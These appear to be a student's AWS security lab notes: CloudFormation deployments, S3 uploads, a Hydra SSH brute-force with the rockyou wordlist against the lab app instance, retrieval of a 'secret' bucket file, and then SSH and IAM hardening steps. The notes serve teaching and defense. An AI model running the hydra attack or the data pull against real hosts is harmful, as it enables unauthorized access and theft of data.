aws cloudformation create-stack --region us-east-1 --stack-name c3-s3 --template-body file://starter/c3-s3.yml

aws cloudformation create-stack --region us-east-1 --stack-name c3-vpc --template-body file://starter/c3-vpc.yml

aws cloudformation create-stack --region us-east-1 --stack-name c3-app --template-body file://starter/c3-app.yml --parameters ParameterKey=KeyPair,ParameterValue=vockey --capabilities CAPABILITY_IAM

aws cloudformation validate-template --template-body file://starter/c3-app.yml

aws ec2 describe-images --image-ids ami-0964e67a489e13cdb

aws ec2 describe-images --image-ids ami-01fcf79ce78f46764

BucketNameRecipesFree	cand-c3-free-recipes-746962099151
BucketNameRecipesSecret	cand-c3-secret-recipes-746962099151

ApplicationURL: c1-web-service-alb-93461698.us-east-1.elb.amazonaws.com
ApplicationInstanceIP: 18.211.48.235
AttackInstanceIP: 44.203.217.44

ApplicationURL	c1-web-service-alb-93461698.us-east-1.elb.amazonaws.com
ApplicationInstanceIP	ec2-18-211-48-235.compute-1.amazonaws.com
AttackInstanceIP	ec2-44-203-217-44.compute-1.amazonaws.com

aws s3 cp ./starter/free_recipe.txt s3://cand-c3-free-recipes-746962099151/ --region us-east-1

aws s3 cp ./starter/secret_recipe.txt s3://cand-c3-secret-recipes-746962099151/ --region us-east-1

http://c1-web-service-alb-93461698.us-east-1.elb.amazonaws.com/free_recipe

cd /home/ubuntu
date
hydra -l ubuntu -P rockyou.txt ssh://ec2-18-211-48-235.compute-1.amazonaws.com

# view the files in the secret recipes bucket
aws s3 ls  s3://cand-c3-secret-recipes-746962099151/ --region us-east-1
 
# download the files
aws s3 cp s3://cand-c3-secret-recipes-746962099151/secret_recipe.txt  .  --region us-east-1

# view contents of the file
cat secret_recipe.txt

# open the file /etc/ssh/sshd_config
sudo nano /etc/ssh/sshd_config

# Find this line:
PasswordAuthentication yes

# change it to:
PasswordAuthentication no

# save and exit

#restart SSH server
sudo service ssh restart

flask -app app run

ssh root@ec2-18-^C7-108-41.compute-1.amazonaws.com

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::cand-c3-free-recipes-746962099151/*",
            "Effect": "Allow"
        }
    ]
}